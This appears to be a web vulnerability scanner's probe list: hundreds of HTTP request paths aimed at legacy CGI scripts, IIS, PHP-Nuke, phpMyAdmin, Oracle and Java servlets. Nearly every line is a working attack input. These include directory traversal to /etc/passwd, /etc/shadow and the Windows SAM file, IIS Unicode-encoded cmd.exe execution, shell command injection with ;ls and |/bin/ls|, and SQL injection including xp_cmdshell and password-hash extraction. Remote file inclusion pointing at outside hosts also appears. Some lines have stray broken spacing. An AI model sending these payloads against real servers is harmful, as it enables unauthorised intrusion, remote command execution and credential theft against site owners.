/phpMyAdmin/sql.php?goto=/etc/hosts&btnDrop=No
/phpMyAdmin/tbl_replace.php?db=test&table=ess&goto=/etc/hosts
/phpMyAdmin/tbl_copy.php?strCopyTableOK=\".passthru(\'/bin/ls\').\"
/phpMyAdmin/tbl_copy.php?db=test&table=haxor&new_name= test.haxor2&strCopyTableOK=\".passthru(\'/bin/ls\').\"
/cgi-bin-sdb/
/cgi-bin/YaBB.pl?board=news&action=display&num=../../../../../../../../etc/hosts%00
/siteman000510/siteman.php3
/cgi-bin/multihtml.pl?multi=/etc/hosts%00html
/search.dll?search?query=%00&logic=AND
m/search.dll?search?query=/&logic=AND
:8002/Newuser?Image=../../database/rbsserv.mdb
/doc/packages/
/cp/rac/nsManager.cgi?Domain=nothing.org&IP=127.0.0.1&OP=a dd&Language=english&Submit=Confirm
/_private/shopping_cart.mdb
/asp/db/message.mdb
/db/message.mdb
/asp/mail/message.mdb
/mail/message.mdb
/mails/message.mdb
/webmail/message.mdb
/cgi-bin/webdata_test.pl
/cgi-bin/cached_feed.cgi?../../../.+/etc/hosts
/cgi-bin/ssi/cgi-bin/ssi
/cgi-bin/ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts
/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F.. %2F..%2Fetc&dispsize=640&start=0
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/cgi-bin/search/search.cgi?keys=*&prc=any&category=../../../../../../../../etc
/scripts/websec.bat/ ..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir%20C:\\
/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\\
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir
/scripts/..%d1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/..%d0%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c0%af../cmd.exe?/c+dir
/msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir+c:\\
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\\
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\\
/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\\
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\\
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\\
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\\
/_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%% 35%63../winnt/system32/cmd.exe?/c+dir+c:\\
/PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\\
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\\
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\\
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\\
/Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\\
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\\
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\\
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\\
/_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\\
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+c:\\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+c:\\
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%% 35%63../winnt/system32/cmd.exe?/c+dir+c:\\
/cgi-bin/shopper.cgi?newpage=../../../../../../../../../etc/hosts
/cgi-bin/Web_Store/web_store.cgi?page=%00
/info.php
/info.php3
/phpinfo.php
/phpinfo.php3
/php/info.php
/php/info.php3
/php/phpinfo.php
/php/phpinfo.php3
/cgi-bin/phpinfo.php
/cgi-bin/phpinfo.php3
:8000/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
:8000/servlet/ssifilter/../../test.jsp
:8000/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
:8000/servlet/jsp/../../tst.txt
:8100//WEB-INF/
:8100//WEB-INF/web.xml
:8100//WEB-INF/webapp.properties
/servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter/../../test.jsp
/servlet/ssifilter/../../test.jsp
/servlet/com.livesoftware.jrun.plugins.jsp.JSP/../../../tst.txt
/servlet/jsp/../../tst.txt
//WEB-INF/
//WEB-INF/web.xml
//WEB-INF/webapp.properties
/cgi-bin/pagelog.cgi?display=../../../../tmp/a
/cgi-bin/pagelog.cgi?name=../../../../../tmp/blah
/cgi-bin/gbook.cgi?_MAILTO=xx;ls
/cgi-bin/search.pl
/admin/includes/
/cgi-bin/bb-hist.sh?HISTFILE=/home/*
/cgi-bin/bb-histlog.sh
/cgi-bin/bb-hostsvc.sh
/cgi-bin/bb-rep.sh
/cgi-bin/bb-replog.sh
/cgi-bin/bb-ack.sh
/cgi-bin/cgiforum.pl?thesection=../../../../../../etc/hosts%00
/cgi-bin/cgiforum.cgi?thesection=../../../../../../etc/hosts%00
/cgi-bin/build.cgi
/build.cgi
/forums/list.php
/cgi-bin/html_page?TEMPLATE=main
/default.php%20%20
/default.php3%20%20
/index.php3%20%20
/index.php%20%20
/index.php3?vhosts=http://go.to
/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?
/cgi-bin/ncommerce/ExecMacro/orderdspc.d2w/report?
/cgi-bin/db2www/library/document.d2w/report?uid=UNKNOWN&pwd=&search_type=SIMPLE&r_host= &last_page= db2www0022.html&fn=db2www.html
/cgi-bin/db2www.exe/../../db2www.ini
/cgi-bin/db2www/../../db2www.ini
/db2_doc/html/db2srsen.exe
/+/
/+./
/++/
/++./
/includes/config.inc
/includes/config.php
/includes/config.php3
/includes/global.inc
/2600-cgi/ezmlm-cgi
/cgi-bin/ezmlm-cgi
/cgi-bin/mmstdod.cgi?ALTERNATE_TEMPLATES=x
/cgi-bin/mmstdol.cgi?ALTERNATE_TEMPLATES=x
/cgi-bin/mmstdod.pl
/cgi-bin/mmstdol.pl
/mmstdod.cgi
/mmstdod.pl
/mmstdol.cgi
/mmstdol.pl
/.\"./.\"./Perl/eg/core/findtar
/.\"./.\"./Perl/eg/core/findtar+&+echo+system(@ARGV);+>+c:\\InetPub\\wwwroot \\cmd.pl+&+.pl
/.\"./.\"./winnt/reapir/sam._%20.pl
/cgi-bin/ad.cgi?file=../../../../../../../../etc/hosts
/ad.cgi?file=../../../../../../../../etc/hosts
/subscribe.pl
/cgi-bin/simplestmail.cgi?redirect= Linkleri Görebilmeniz için Üye Olmanız Gerekiyor. /everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=swoopme@hotmail.com
/cgi-bin/everythingform.cgi?config=../../../../../../../../bin/ping&Name=xx&e-mail=swoopme@hotmail.com
/cgi-bin/dcguest.cgi
/cgi-bin/dcguest/dcguest.cgi
/guestbook/dcguest.cgi
/cgi-bin/guestbook.pl
/cgi-bin/guestbook.data
/cgi-bin/guestbook.config
/cgi-bin/guestbook.cgi
/index.php3.%5c../..%5cconf/httpd.conf
/phpgroupware/inc/phpgwapi/phpgw.inc.php
/submit.php
/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/
/cgi-bin/ezshopper2/loadpage.cgi?id+/
/cgi-bin/passcfg
/passcfg
/pls/orasso/orasso.wwsso_app_admin.ls_login
/pls/orasso/
/pls/admin_/?
/pls/admin_/help/..%5Cplsql.conf
/pls/demo/owa_util.signature
/pls/demo/%20owa_util.signature
/pls/demo/%0aowa_util.signature
/pls/demo/%08owa_util.signature
/pls/demo/owa_util.showsource?cname=owa_util
/pls/demo/owa_util.showsource?cname=owa_util
/pls/demo/owa_util.cellsprint?p_theQuery=select+*+from+sys.d ba_users&p_max_rows=10
/pls/demo/owa_util.listprint?p_theQuery=select+*+from+sys.db a_users&p_cname=&p_nsize=
/pls/demo/owa_util.show_query_columns?ctable=sys.dba_users
/Globals.jsa
/servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
/xsql/java/xsql/demo/adhocsql/query.xsql?xml-stylesheet=none.xml&sql=select+*+from+sys.dba_user s
/soap/servlet/soaprouter
/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
/servlet/oracle.xml.xsql.XSQLServlet/soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
/dms0
/dms/DMSDump
/servlet/DMSDump
/servlet/Spy
/soap/servlet/Spy
/dms/AggreSpy
/oprocmgr-status
/oprocmgr-service
/demo/email/sendmail.jsp
/demo/basic/info/info.jsp
/fcgi-bin/echo
/fcgi-bin/echo2
/WebDB/admin_/
/cgi-bin/bsguest.cgi?email=x;ls
/cgi-bin/bslist.cgi?email=x;ls
/technote/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
/cgi-bin/main.cgi/oops?board=FREE_BOARD&command=down_load&filename=/../../../main.cgi
/technote/technote/print.cgi?board=../../../../../../../../etc/passwd%00
/cgi-bin/technote/print.cgi?board=../../../../../../../../etc/passwd%00
/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../bin/ls
/servlet/FormMailServlet?
.txt
/servlet/SurveyXMLServlet?jeaaa.txt
/servlet/WebPopServlet?config=uii.txt
/cgi-bin/iconboard/register.cgi?SEND_MAIL=/bin/ls
/cgi-bin/webdriver
/cgi-bin/mailmanager.pl?setupfile=demo&page=|/bin/ls|
/cgi-bin/mailman/mailmanager.pl?setupfile=demo&page=|/bin/ls|
/cgi-bin/gettext.pl
/cgi-bin/newsdesk.cgi?t=../pass.txt
/cgi-bin/ping.cgi
/cgi-bin/traceroute.cgi
/cgi-bin/finger.cgi
/cgi-bin/whois.cgi
/.nsf/../winnt/win.ini
/.box/../winnt/win.ini
/.ns4/../winnt/win.ini
/.nsf/../lotus/domino/notes.ini
/%00.nsf/../lotus/domino/notes.ini
/cgi-bin/bbs_forum.cgi?forum=test&read=../bbs_forum.cgi
/cgi-bin/debug.pl
/cgi-bin/debug.cgi
/mysql.class
/class/mysql.class
/inc/sendmail.inc
/cgi-bin/statsconfig.pl
/cgi-bin/stats.pl
/deletecontact.php?item_id=100+OR+TRUE+;
/cgi-bin/pi?page=document/show_file&id=
/./WEB-INF/
/./WEB-INF/web.xml
:8000/./WEB-INF/
:8000/./WEB-INF/web.xml
/cgi-bin/hsx.cgi?show=../../../../../../../etc/hosts%00
/cgi-bin/suche/hsx.cgi?show=../../../../../../../etc/hosts%00
/user_info.php3?user_username=\'\'+or+admin_level=2+o r+username%3d\'x\'+and+users.id= access.user_id;%00
/cgi-bin/user_info.php3?user_username=\'\'+or+admin_level=2+o r+username%3d\'x\'+and+users.id=access.user_id;%00
/guestserver/guestserver.cgi?email=|ls|swoopme@hotmail.com
/cgi-bin/guestserver.cgi?email=|ls|swoopme@hotmail.com
/cfbin/board.cgi
/cgi-bin/board.cgi
/cgi-bin/getcomments.pl
/..\\..\\..\\..\\..\\..\\winnt\\system32\\cmd.exe?/c+
/cgi-bin/form- to-mail.cgi?_out_file=mungo.dat&x=y
/cgi-bin/leave-link.cgi?file=mungo.dat&url=hoschi.net
/cgi/commerce.cgi?page=../../../../etc/hosts%00index.html
/cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html
/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/hosts
/pals-cgi?palsAction=restart&documentName=pals-cgi
/cgi-bin/pals-cgi?palsAction=restart&documentName=pals-cgi
/opendir.php?requesturl=/etc/hosts
/ROADS/cgi-bin/search.pl?form=search.pl%00
/cgi-bin/search.pl?form=search.pl%00
/cgi-bin/empower?DB=mungowitsch
/cgi-bin/way-board.cgi?db=way-board.cgi%00
/way-board/way-board.cgi?db=way-board.cgi%00
/cgi-bin/webspirs.cgi?sp.nextform= webspirs.cgi
/cgi-bin/sendtemp.pl?templ=../../etc/passwd
/upload.html
/cgi/bin/test.txt;%20/bin/ls
/cgi-bin/test.txt;%20/bin/ls
/isapi/tstisapi.dll
/cgi-bin/store.cgi?StartID=../../../../../../../etc/hosts%00
/cgi-bin/adcycle/adcenter.cgi
/ext.dll
/cgi-bin/mailnews.cgi
/caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd
/caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini
/caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server
/caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC
/caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000
/foldoc/template.cgi?template.cgi
/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/hosts%00
/cgi-bin/ikonboard.cgi
/cgi-bin/post-query?
/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../etc/hosts
:8080/../../winnt/win.ini%00examples/jsp/hello.jsp
/../../winnt/win.ini%00examples/jsp/hello.jsp
:8080/index.js%70
/index.js%70
/cgi-bin/webspirs.cgi?sp.nextform=../../../../../../etc/hosts
/jsp_test/PoolMan.jsp
/PoolMan.jsp
:8080/.jsp/WEB-INF/classes/Env.java
/.jsp/WEB-INF/classes/Env.java
/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
/cgi-bin/nph-maillist.pl
/content.pl?group=49&id=140%20or%20id>0%20or%20ls_i d<1000
/cgi-bin/processit.pl
/quote.html?filename=../../../../../../../../../../../../../../../../etc/hosts&path_to_font_file= ariali.ttf
:6346/........../windows/win.ini
/cgi-bin/cal_make.pl?p0=../../../../../../../../../../../../etc/hosts%00
/cgi-bin/a1stats/a1disp3.cgi?../../../../../../../etc/hosts
/cgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/hosts
/cgi-bin/a1stats/a1disp.cgi?|/bin/ls|
/%2e%2e/%2e%2e/%2e%2e/scandisk.log
/../scandisk.log
/scripts/Carello/Carello.dll?CARELLOCODE=SITE2&VBEXE=C:\\..\\winnt\\sy stem32\\cmd.exe%20/c%20echo%20test>c:\\defcom.txt
/cgi-bin/sgdynamo.exe?HTNAME=default.htm
/pass?loginpass=a&redirect=0%2F&Submit=Login
/.../.../scandisk.log
/..../scandisk.log
/chip.ini
/ChipCfg.cfg
/ChipCfg
/cgi-bin/viewsrc.cgi?loc=../../../../../../../../etc/hosts
/cgi-bin/directorypro.cgi?want=showcat&show=../../../..//etc/hosts%00
:9090//etc/shadow
/interscan/cgi-bin/FtpSave.dll?no
/interscan/cgi-bin/FtpSave.dll?yes
/interscan/cgi-bin/FtpSave.dll?I\'m%20here
/cgi-bin/CatalogMgr.pl?cartID=366&template=CatalogMgr.pl
/admin/?op=%c0
:631/admin/?op=%c0
/cgi-bin/ws_mail.cgi?kill=ng
:8000/file/%2E%2E/test1.mp3
/basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=blah&password=blah
/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts&id=1
/vpopmail.php
/mail/vpopmail.php
/webmail/vpopmail.php
:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/hosts&id=1
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
:30001/SWEditServlet?station_path=Z&publication_id=2043&t emplate=../../../../../../../etc/hosts
/SWEditServlet?station_path=Z&publication_id=2043&t emplate=../../../../../../../etc/hosts
:30001/../../template/shared/indexTemplate.xml
/../../template/shared/indexTemplate.xml
/servlet/com.unify.ewave.servletexec.UploadServlet
/imp/compose.php
/compose.php
/AdLogin.pm
/adcycle/AdLogin.pm
/cgi-bin/story.cgi?next=
/webmacro/Page?db=tst&wmtemplate=ttt
/webmacro/org.paneris.paneris.controller.Page?db=tst&wmtempl ate=ttt
/mailman/edithtml
/cgi-bin/uncgi
/sbin/nscgi.cfg
/administrator/index2.php?PHPSESSID=1&myname=admin&fullname=admin &userid=administrator
/session/pagecount?page=
:8080/../ssd.ini
/scripts/wsendmail.exe
/cgi-bin/wsendmail.exe
/scripts/toos/mkilog.exe
/scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=ngt(ng% 20int);EXEC+master..xp_cmdshell(\" cmd.exe+/c%20dir\");--
/cgi-bin/sdbsearch.cgi?stichwort=keyword
/phpBBfolder/prefs.php?save=1&viewemail=1\',user_level%3D\'4\'%20w here%20username%3 D\'hoschi\'%23
/phpBB/bb_memberlist.php?sortby=user_regdate
/cgi-bin/mail.cgi
/scripts/mail.cgi
/cgi-bin/mailform.exe
/scripts/mailform.exe
/cgi-bin/mailsend.exe
/scripts/mailsend.exe
/cgi-bin/mailme.exe
/scripts/mailme.exe
/cgi-bin/mailmepro.exe
/scripts/mailmepro.exe
/cgi-bin/MailPost.exe
/scripts/MailPost.exe
/cgi-bin/postie.exe
/cgi-bin/postie.cgi
/scripts/postie.exe
/scripts/postie.cgi
/cgi-bin/formvar.exe
/scripts/formvar.exe
/cgi-bin/blat.exe
/scripts/blat.exe
/cgi-bin/cgimail.exe
/scripts/cgimail.exe
/cgi-bin/webboard/generate.cgi?content=../../../../../../../../../etc/hosts%00&board=tst
/cgi-bin/ncbook/book.cgi?action=default¤t=|ls|&form_tid=9966 04045&prev= main.html&list_message_index=10
:4096/../../../winnt/repair/sam._
/4DBin/_/C:/winnt/repair/sam._
/4DBin/_/../winnt/repair/sam._
/4DBin/_/C:/inetpub/../boot.ini
/4DBin/_/../boot.ini
/4DBin/_/../inetpub/../boot.ini
/ext.dll%00
/cgiWebupdate.exe
/index.php?file=http://xxx&fcmd=ls
/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F%2F etc
/basilix/basilix.php3?username=blah;ls
/basilix/basilix.php?username=blah;ls
/quickstart/util/srcview.aspx?path=./&file=srcview.aspx&font=3
/a%5c.aspx
/web.config
/edit_image.php?dn=1&userfile=/etc/hosts&userfile_name=%20;ls;%20
/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&fil e= ;ls|
/cgi-local/shop.pl/SID=947626980.19094/page=;ls|
/cgi-shop/view_item?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
/cgi-shop/view_item.pl?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
/cgi-bin/powerup/r.cgi?FILE=main.html
/cgi-bin/powerup/r.pl?FILE=main.html
/cgi-bin/common/listrec.pl?APP=qmh-news&TEMPLATE=;ls|
/cgi-bin/eshop.pl?seite=;ls|
/cgi-bin/shop.pl?page=xxx
/admin.php?upload=1&file= config.php&file_name=tmp.txt&wdir=/images/&userfile=config.php&userfile_name=tmp.txt
/images/tmp.txt
/cgi-bin/html_page?TEMPLATE=main
/homebet/homebet.dll?form=menu&option=menu-signin
/homebet/homebet.log
/cgi-bin/console.exe?page_size=
/cgi-bin/cs.exe?action=
/cgi-bin/forma
/run/forma
/cgi-bin/w3mail/login.cgi
/servlet/psoft.hsphere.CP
/tst/psoft.hsphere.CP/tst/?template_name=x
/servlet/webacc?User.html=../../../../../../../../boot.ini%00
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;l s|&CODE=PHOLD
/network_query.php?portNum=80&queryType=all&target= 127.0.0.1%3Bls+-l&Submit=Do+It
/run.cgi
/cgi-bin/ibillpm.pl
/sek-bin/helpwin.gas.bat?mode=&draw=x&file=x&module=&locale =../../config/log.conf%00%5c&chapter=
/sek-bin/login.gas.bat?Template=../../../../../../../../etc/hosts&LOCALE=en_US&AUTHMETHOD=UserPassword
/cgi-bin/lb5000/search.cgi
/join.cfm
/admin/case/case.filemanager.php/admin.php?op=move&confirm=1&do=copy&basedir=&file=/tmp/dat.dat&newfile=done.php
/modules.php?set_albumName=album01&id=aaw&op=modloa d&name=gallery&file=index&include=../../../../../../etc/hosts
/modules.php?name=Downloads&d_op=viewdownload&cid=5 9%20or%20cid=2
/modules.php?name=Members_List&letter=\'%20OR%20user _level=\'4\'/*
/modules/WebMail/mailattach.php
/modules.php?op=modload&name=Forums&file=viewtopic& topic=1&forum=1\'sql
/modules.php?op=modload&name=Forums&file=viewforum& forum=\'%20OR%201=1;--
/modules.php?op=modload&name=Forums&file=reply&foru m=1\');--
/modules.php?op=modload&name=Forums&file=newtopic&f orum=1\');--
/modules.php?op=modload&name=Forums&file=editpost&f orum=1\';--
/modules.php?op=modload&name=Forums&file=attachment &AtchOp=show
/modules.php?name=AvantGo&file=print&sid=textgoeshe rexxx
/modules.php?op=modload&name=Web_Links&file=index&l _op=viewlink&cid=2%23sql_injection
/nuke73/modules.php?name=Calendar&file=index&type=view&eid =-99%20UNION%20ALL%20SELECT%201,1,aid,1,pwd,1,1,1,1, 1,1,1,1,1,1%20FROM%20nuke_authors%20WHERE%20radmin super=1
/module.php?link=http://anotherhost_file_extension
/global.cnf
/asearch.cnf
/hypermail
/ifx/?LO=../../../../../../../../../etc/hosts
/stronghold-info
/stronghold-status
/cgi-bin/sendpage.pl?message=test\";/bin/ls;echo%20\"message
/cgi-bin/NUL/../../../../WINNT/system32/ipconfig.exe+HTTP/1.0
/cgi-sys/PGPMail.pl
/cgi-bin/PGPMail.pl
/Test11.asp
/AspUpload/Samples/Test11.asp
/components/AspUpload/Samples/Test11.asp
/components/AspUpload/Samples/UploadScript11.asp
/components/AspUpload/Samples/DirectoryListing.asp
:13333/cgi-bin/forms.exe?extension=foobar&command=Add+Extension
:13333/cgi-bin/forms.exe?command=change_index_mode&mode=config
:10000/net/
:10000/servers/link.cgi/1/init/edit_action.cgi?0+../../../../../../../../../etc/hosts
/cgi-bin/paramtool
/cgi-bin/hwtestio
/a/
/cgi-bin/csvform.pl?file=/bin/ls%00|
/manual.php
/servlet/ServletManager?username=servlet&password=manager
/cgi-bin/mgrqcgi?APPNAME=&PRGNAME=200As&ARGUMENTS=&PageID=& mgaction=&H_ShopID=&H_SID=&H_WID=&H_INF=
/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/viewcode.jse+httplist/httplist.htm+httplist/httplist.jse
/phprocketaddin/?page=../../../../../../../etc/hosts
/cgi-bin/lastlines.cgi
/cgi-bin/zml.cgi?file=../../../../../../../../../etc/hosts%00
/modules.php?name=Members_List&&sql_debug=1
/modules.php?name=Your_Account&op=userinfo&uname=
/Secure/Local/console/cmhome.htm
/cgi-bin/boozt/admin/index.cgi
/applist.asp
/oetaki/oetaki.cgi
/oetaki/oekakibbs.conf
/plugins/squirrelspell/modules/check_me.mod.php?SQSPELL_APP[blah]=wall%20hello&sqspell_use_app=blah&attachment_dir=/tmp&username_sqspell_data=plik
/data/default_pref
/data/administrator.pref
/data/admin.pref
/data/root.pref
/cgi-bin/ttawebtop.cgi/?action=start&pg=
/wikihome/action/conflict.php?TemplateDir=http://my.host/
/hostingcontroller
/advwebadmin
/cgi-bin/store/agora.cgi?page=hoschi.html
/userinfo.php?uid=33;
/cgi-bin/publisher/search.cgi?dir=jobs&template=;ls|&output_number=10
/forum/forumdisplay.php?s=&forumid=
/forums/forumdisplay.php?s=&forumid=
/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/hosts
/cgi-bin/14all-1.1.cgi?cfg=../../../../../../../../etc/hosts
/cgi-bin/traffic.cgi?cfg=../../../../../../../../etc/hosts
/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/hosts
/cgi-bin/fom/fom.cgi?cmd=**********alert(x)</script>&file=1&keywords=x
/scripts/texis.exe/ngohos
/cgi-bin/texis.exe/ngohos
/cgi-bin/texis/hoschiboschi
/globals.jsa
/_pages/
/demo/email/sendmail.jsp
/demo/basic/info/info.jsp
/cgi-bin/auction/auction.pl?action=tst
/cgi-bin/auctiondeluxe/auction.pl?action=tst
/netget?sid=user&msg=300&file=/../../../filename.ext
/ezboard/ezboard.cgi
/ez2000/ezboard.cgi
/ezboard/ezman.cgi
/ez2000/ezman.cgi
/ezboard/ezadmin.cgi
/ez2000/ezadmin.cgi
/scripts/CWMail.exe
/cgi-bin/CWMail.exe
/sips/htdocs/preferences.php
/sips/htdocs/admin/index.php
/user_update.php
/add_user.php
/scripts/gnujsp//
/servlets/gnujsp//
/scripts/webnews.exe
/cgi-bin/webnews.cgi
/cgi-bin/ans.pl?p=../../../../bin/ls|&blah
/ans.pl?p=../../../../bin/ls|&blah
/pforum/edituser.php
:8000/servlet/com.endymion.sake.servlet.mail.MailServlet?
/servlet/com.endymion.sake.servlet.mail.MailServlet?
/mail?
/cgi-bin/gm.cgi
/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/jabber/comment2.jse+/system/autoexec.ncf
/us/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\\boot.ini
/cgi-bin/sewse.exe?d:/internet/sites/us/sewse/jabber/comment2.jse+c:\\boot.ini
/.cobalt/sysManage/../admin/.htaccess
:81/.cobalt/sysManage/../admin/.htaccess
/scripts/webplus.exe
/cgi-bin/webplus.exe
/unix/ALEX/Xerver2.10/
/directory.php?dir=%3Bmore%20/etc/passwd
:8383/cd-cgi/sscd_suncourier.pl
/netutils/nettools.php
/nettools.php
/News/article.php
/File_editor.asp
/Folderactions.asp
/cgi-bin/traceroute.pl
/forum/memberlist.php
/cgi-bin/dcshop.cgi
/scrivi.php
/portal/administration/userman.php
/csSearch.cgi?command=savesetup&setup=`/bin/ls`
/scripts/cs/cssearch.cgi?command=all&setup=`/bin/ls`
/op/cs/cssearch.cgi?command=all&setup=`/bin/ls`
/cgi-script/CSSearch/CSSearch.cgi
/cgi-bin/CSSearch/CSSearch.cgi
/boilerplate.asp?NFuse_Template=../../winnt/system32/axperf.ini&NFuse_CurrentFolder=/
/cgi-bin/wwwi32.exe/[in=c:\\\\boot.ini]
/scripts/wwwi32.exe/[in=c:\\\\boot.ini]
/user.php?caselist[mungo.txt][path]=http://www.somehost.cc&command=/bin/ls
/src/options.php
/src/left_main.php
/cgi-win/testcgi.exe?tata=xxxxxuseolstr
/cgi-bin/testcgi.exe?xssstringo
/cgi-win/Pbcgi.exe?tata=xxxxuseolstr
/mail/admin
/emumail.cgi?type=fh%00
:2002/..\\..\\..\\..\\..\\..\\temp\\temp.class
/cgi-bin/%2e%2e/abyss.conf
/site/page.html
/site/\'+UNION+ALL+SELECT+FileToClob(\'/etc/hosts\',\'server\')::html,0+FROM+sysusers+WHERE+usern ame+=+USER+--/.html
/sws/admin.html
/cgi-bin/sws/manager.pl?
/wbboard/reply.php
/dm/demarc
/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp
/cgi-bin/FileSeek.cgi?head=&foot=;id|
/cgi-bin/FileSeek2.cgi
/cgi-bin/environ.pl+%00
:1099/reports/superlongstringxxxaso
/BOADMIN/BACKOFFICE/SERVICES.ASP
/pvote/ch_info.php
/nul..dbm
/approval/ts_app.htm?TSN=123456
/reports/temp/
/members.asp?mode=search&M_NAME=A&initial=1&method=
:8080/examples/servlet/SnoopServlet
:8080/examples/servlet/TroubleShooter
/cgi-script/CSMailto/CSMailto.cgi?form-attachment=/bin/ls|&command=mailform
/cgi-bin/CSMailto.cgi?form-attachment=/bin/ls|&command=mailform
/cgi-bin/CSMailto/CSMailto.cgi?form-attachment=/bin/ls|&command=mailform
/phpprojekt/
/dnstools.php?section=hosts&user_logged_in=true
/dnstools.php?section=security&user_logged_in=true& user_dnstools_administrator=YES
/dostuff.php?action=modify_user
:1500/CONF&LOG=/etc/hosts&NOIH=no&FRAMES=y
/cgi-bin/man.cgi/usr/include;IFS=G;lsG-alsi;|
/cgi-bin/search.cgi?q=query
/cgi-bin/netpad.cgi?proc=open&of=
/servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5c\\global.asa
/servlet/com.newatlanta.servletexec.JSPServlet/
/phorum/admin/actions/del.php?include_path=http://phonehomedotcom&cmd=ls
/phorum5012/follow.php?forum_id=1&,f00=bar,1=-99_union_stuff
/admin/browse.asp?FilePath=c:\\&Opt=2&level=0
/admin/dsn/dsnmanager.asp?DSNAction=ChangeRoot&RootName=D:\\we bspace\\opendnsserver\\target\\target.c om\\db\\..\\..\\..\\..\\
